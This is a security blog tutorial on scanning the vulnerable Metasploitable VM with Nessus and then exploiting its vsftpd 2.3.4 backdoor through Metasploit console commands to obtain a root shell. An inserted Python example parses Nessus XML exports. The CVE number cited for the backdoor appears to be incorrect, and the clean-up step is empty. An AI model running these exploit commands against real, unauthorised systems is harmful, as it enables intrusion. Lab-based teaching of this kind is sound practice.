Blog | G5 Cyber Security

Nessus Scan & Metasploitable Attack

TL;DR

This guide shows you how to use Nessus to identify vulnerabilities on a deliberately vulnerable virtual machine (Metasploitable) and then exploit one of those vulnerabilities using Metasploit. This is for learning purposes only – never scan or attack systems without explicit permission.

Prerequisites

Step 1: Discover Metasploitable

First, we need to tell Nessus about the target machine.

  1. Open Nessus and click on ‘New Scan’.
  2. Choose ‘Basic Network Scan’ as your scan type.
  3. Give the scan a name (e.g., “Metasploitable Scan”) and description.
  4. Enter the IP address of your Metasploitable VM in the ‘Target’ field. You can find this using ifconfig within the Metasploitable terminal:
    ifconfig eth0 | grep 'inet addr:'

    The IP address will be after ‘inet addr:’.

  5. Click ‘Save’.

Step 2: Run the Scan

Now, launch the scan to find potential weaknesses.

  1. Select your newly created scan from the Nessus dashboard.
  2. Click the green ‘Launch’ button.
  3. Wait for the scan to complete. This can take 30 minutes or more depending on your hardware and network speed.

Step 3: Analyse Scan Results

Nessus will present a report of vulnerabilities found.

  1. Once the scan is finished, review the ‘Overview’ tab for a summary of critical, high, medium and low severity findings.
  2. Click on individual vulnerabilities to see details, including descriptions, potential impact, and remediation steps.
  3. For this example, we’ll exploit the vsftpd 2.3.4 Backdoor Command Execution vulnerability (CVE-2011-5720). This is usually listed as a high severity finding.
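To triage the Step 3 report outside the Nessus UI, here is an added Python example (not from the original post and not Tenable's code) that parses a .nessus XML export and lists findings at high or critical severity together with their remediation text; the embedded export, its plugin IDs and the CVE value are constructed placeholders, and the element names assume the standard NessusClientData_v2 layout.

```python
import xml.etree.ElementTree as ET

# Constructed sample of a Nessus .nessus (XML) export, trimmed to the fields
# used below. Plugin IDs and the CVE are placeholders, not real identifiers.
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="Metasploitable Scan">
    <ReportHost name="192.0.2.10">
      <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="4"
                  pluginID="00001" pluginName="vsftpd 2.3.4 Backdoor Command Execution">
        <cve>CVE-0000-0000</cve>
        <risk_factor>Critical</risk_factor>
        <solution>Upgrade to a vsftpd build that does not contain the backdoor.</solution>
      </ReportItem>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
                  pluginID="00002" pluginName="SSH Server Type and Version">
        <risk_factor>None</risk_factor>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

# Nessus severity attribute: 0 info, 1 low, 2 medium, 3 high, 4 critical
SEVERITY_NAMES = {0: "info", 1: "low", 2: "medium", 3: "high", 4: "critical"}

def parse_findings(nessus_xml, min_severity=3):
    """Return ReportItems at or above min_severity, most severe first."""
    root = ET.fromstring(nessus_xml)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            level = int(item.get("severity", "0"))
            if level < min_severity:
                continue  # skip informational/low noise for triage
            findings.append({
                "host": host.get("name"),
                "port": f"{item.get('port')}/{item.get('protocol')}",
                "service": item.get("svc_name"),
                "level": level,
                "severity": SEVERITY_NAMES.get(level, "unknown"),
                "plugin": item.get("pluginName"),
                "cves": [c.text for c in item.findall("cve")],
                "solution": (item.findtext("solution") or "").strip(),
            })
    return sorted(findings, key=lambda f: f["level"], reverse=True)

if __name__ == "__main__":
    for f in parse_findings(SAMPLE_NESSUS):
        print(f["severity"], f["host"], f["port"], f["plugin"], "->", f["solution"])
```

Point it at a real export (Nessus: scan page, Export, Nessus format) by reading the file into a string and passing it to parse_findings.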

Step 4: Exploit with Metasploit

We’ll use the Metasploit framework to exploit the vsftpd vulnerability.

  1. Open a terminal and start Metasploit using msfconsole.
  2. Search for the appropriate module:
    search vsftpd 2.3.4

    This should return the ‘exploit/unix/ftp/vsftpd_234_backdoor’ module.

  3. Use the module:
    use exploit/unix/ftp/vsftpd_234_backdoor

  4. Set the target IP address:
    set RHOSTS [Metasploitable IP Address]

    Replace ‘[Metasploitable IP Address]’ with the actual IP.

  5. Run the exploit:
    run

    This will attempt to gain a shell on Metasploitable.

  6. If successful, you’ll get a root shell! You can verify this by running whoami which should output ‘root’.

Step 5: Clean Up (Important)

After the exploit, it’s vital to clean up.
